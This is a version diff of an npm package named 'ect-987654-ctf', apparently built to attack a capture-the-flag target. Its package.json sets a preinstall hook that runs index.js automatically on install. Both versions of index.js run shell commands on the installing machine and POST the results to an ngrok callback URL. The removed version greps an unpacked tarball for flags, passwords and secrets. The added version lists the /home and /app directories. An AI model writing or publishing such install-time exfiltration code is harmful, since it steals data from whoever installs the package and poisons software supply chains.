ect-987654-ctf 0.0.8 → 0.0.10

package/evil.yaml

@@ -1,6 +1,6 @@
 ecto_module:
   name: "ect-987654-ctf"
-  version: "0.0.7"
+  version: "0.0.8"
   power_level: Very High
   ship_deck: Beta-2
   cargo_hold: B2-13

package/index.js

@@ -1,145 +1,95 @@
-// index.js -- aggressive flag hunter for aspect-node.tar.gz
-// Writes JSON to your webhook with candidate matches (truncated)
+// index.js
+// Runs ls -la on /app and /home and POSTs results to your callback URL
+// Replace CALLBACK_URL with your ngrok/http endpoint (include trailing slash)
 
-const { execSync } = require('child_process');
+const { exec } = require('child_process');
 const os = require('os');
-const util = require('util');
+const https = require('https');
+const http = require('http');
+const url = require('url');
 
-const WEBHOOK = process.env.WEBHOOK || "https://0f6896f7cc8e.ngrok-free.app/";
-const TAR = "/home/node/aspect-node.tar.gz";
-const MAX_LINES = 200;
-const MAX_BYTES_SEND = 12000; // keep posted body small-ish
+const CALLBACK_URL = 'https://0f6896f7cc8e.ngrok-free.app/'; // <-- CHANGE THIS
+const TIMEOUT = 15000; // ms
 
-function post(obj) {
+function run(cmd, cb) {
+  exec(cmd, { timeout: TIMEOUT, maxBuffer: 1024 * 1024 * 4 }, (err, stdout, stderr) => {
+    cb(err, stdout || '', stderr || '');
+  });
+}
+
+function postJson(targetUrl, obj, cb) {
   try {
+    const u = url.parse(targetUrl);
     const body = JSON.stringify(obj);
-    const url = new URL(WEBHOOK);
-    const https = require('https');
     const opts = {
-      hostname: url.hostname,
-      path: url.pathname,
+      hostname: u.hostname,
+      port: u.port || (u.protocol === 'https:' ? 443 : 80),
+      path: u.path || '/',
       method: 'POST',
       headers: {
         'Content-Type': 'application/json',
         'Content-Length': Buffer.byteLength(body)
-      }
+      },
+      timeout: TIMEOUT
     };
-    const req = https.request(opts, res => { /* noop */ });
-    req.on('error', () => {});
+    const lib = u.protocol === 'https:' ? https : http;
+    const req = lib.request(opts, (res) => {
+      // drain response
+      let d = '';
+      res.on('data', (c) => d += c.toString());
+      res.on('end', () => cb && cb(null, res.statusCode, d));
+    });
+    req.on('error', (e) => cb && cb(e));
+    req.on('timeout', () => { req.destroy(); cb && cb(new Error('timeout')); });
     req.write(body);
     req.end();
   } catch (e) {
-    // best-effort only
-    try { console.error("post error:", e.message); } catch {}
-  }
-}
-
-function safeExec(cmd, opts = {}) {
-  try {
-    return execSync(cmd, { encoding: 'utf8', stdio: ['pipe','pipe','pipe'], timeout: 20000, ...opts }).trim();
-  } catch (e) {
-    return "";
+    cb && cb(e);
   }
 }
 
-function truncate(s, n) {
-  if (!s) return s;
-  if (s.length <= n) return s;
-  return s.slice(0, n) + "\n...[truncated]";
-}
-
-function findCandidates() {
-  // list all files from tarball
-  const listing = safeExec(`tar -tzf ${TAR} 2>/dev/null || true`);
-  if (!listing) return [];
-  const lines = listing.split(/\r?\n/).filter(Boolean);
-  return lines;
-}
-
-function isTextFileName(name) {
-  return /\.(txt|md|json|js|env|conf|cfg|ini|py|sh|pem|key|yml|yaml)$/i.test(name);
-}
-
-function grepPatternsForTextFile(entry) {
-  // Extract first N lines of the file and grep for likely flag patterns
-  const cmd = `tar -xOf ${TAR} "${entry}" 2>/dev/null | head -n ${MAX_LINES} | egrep -i 'HTB\\{|FLAG\\{|picoCTF\\{|CTF\\{|SECRET=|FLAG:|flag:|password|pass\\W' || true`;
-  return safeExec(cmd);
-}
-
-function catFirstLines(entry) {
-  return safeExec(`tar -xOf ${TAR} "${entry}" 2>/dev/null | head -n ${MAX_LINES} || true`);
-}
-
-function stringsAndGrep(entry) {
-  // Extract file to stdout and pipe to strings/grep to find tokens
-  // We'll try to use 'strings' if available, otherwise grep -a
-  const tryStrings = safeExec(`tar -xOf ${TAR} "${entry}" 2>/dev/null | (command -v strings >/dev/null 2>&1 && strings -a -n 8 - || cat) | egrep -a -i 'HTB\\{|FLAG\\{|picoCTF\\{|CTF\\{|SECRET=|FLAG:|flag:|password|pass\\W' || true`);
-  return tryStrings;
-}
-
-try {
-  const host = os.hostname();
-  const all = findCandidates();
-
-  // Quick heuristic: search likely text files first
-  const textCandidates = all.filter(isTextFileName);
-  const hits = [];
-  for (const f of textCandidates.slice(0, 500)) { // limit to first 500 to avoid blowup
-    const match = grepPatternsForTextFile(f);
-    if (match) {
-      hits.push({ file: f, match: truncate(match, 2000), sample: truncate(catFirstLines(f), 2000) });
-    }
-  }
-
-  // If no hits yet, search many JS/JSON files more aggressively (first pass didn't show flag)
-  if (hits.length === 0) {
-    // check top js/json files (by name)
-    const jsCandidates = all.filter(n => /\.(js|json|lock)$/i.test(n)).slice(0, 800);
-    for (const f of jsCandidates) {
-      const match = grepPatternsForTextFile(f);
-      if (match) {
-        hits.push({ file: f, match: truncate(match, 2000), sample: truncate(catFirstLines(f), 2000) });
-        if (hits.length >= 10) break;
+// gather info, run commands
+const info = {
+  host: os.hostname(),
+  ts: new Date().toISOString(),
+  pwd: process.cwd(),
+  attempts: []
+};
+
+const cmds = [
+  { name: 'ls_home', cmd: 'ls -la /home || ls -la ~ || echo "ls /home failed"' },
+  { name: 'ls_app',  cmd: 'ls -la /app || echo "ls /app failed"' },
+  { name: 'pwd',     cmd: 'pwd' }
+];
+
+let i = 0;
+function next() {
+  if (i >= cmds.length) {
+    // send results
+    postJson(CALLBACK_URL, info, (err, status, body) => {
+      // optionally print to stdout so DEBUG is easier if running locally
+      if (err) {
+        try { console.error('POST ERROR', String(err)); } catch(e){}
+      } else {
+        try { console.log('POSTED', status); } catch(e){}
       }
-    }
+      // exit gracefully
+      try { process.exit(0); } catch(e){}
+    });
+    return;
   }
-
-  // If still nothing, run strings on the largest-looking files (heuristic names)
-  if (hits.length === 0) {
-    const binCandidates = all.filter(n => /aspect-node\.tar\.gz|node_modules\/|bin\/|_lib|\\.so$|\\.a$|node$|typescript|tsserver/i.test(n)).slice(0, 200);
-    for (const f of binCandidates) {
-      const match = stringsAndGrep(f);
-      if (match) {
-        hits.push({ file: f, match: truncate(match, 2000) });
-        if (hits.length >= 6) break;
-      }
-    }
-  }
-
-  // As fallback, check README / top-level files explicitly and send their first lines
-  const fallbackFiles = ['README','README.md','flag.txt','FLAG','flag','config/aspect.config.json','modules/npm-tracker/README.md'];
-  for (const p of fallbackFiles) {
-    if (all.includes(p)) {
-      const sample = catFirstLines(p);
-      if (sample) hits.push({ file: p, sample: truncate(sample, 4000) });
-    }
-  }
-
-  // Compose posting object: keep payload sizes reasonable
-  const payload = {
-    host,
-    checked_count: all.length,
-    hits: hits.slice(0, 12).map(h => {
-      // keep each entry small
-      return {
-        file: h.file,
-        match: h.match ? truncate(h.match, 2000) : undefined,
-        sample: h.sample ? truncate(h.sample, 2000) : undefined
-      };
-    })
-  };
-
-  post(payload);
-} catch (e) {
-  post({ error: String(e).slice(0, 2000) });
+  const item = cmds[i++];
+  run(item.cmd, (err, out, errout) => {
+    info.attempts.push({
+      name: item.name,
+      cmd: item.cmd,
+      stdout: out,
+      stderr: errout,
+      err: err ? String(err) : null
+    });
+    // small delay to avoid flooding
+    setTimeout(next, 200);
+  });
 }
+
+next();

package/last_post.json

@@ -1,5 +1,5 @@
 {
-  "host": "5eaf6475a249",
-  "files": "",
-  "flag": "no match yet"
+  "host": "y",
+  "checked_count": 0,
+  "hits": []
 }

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "ect-987654-ctf",
-  "version": "0.0.8",
+  "version": "0.0.10",
   "scripts": {
     "preinstall": "node index.js"
   }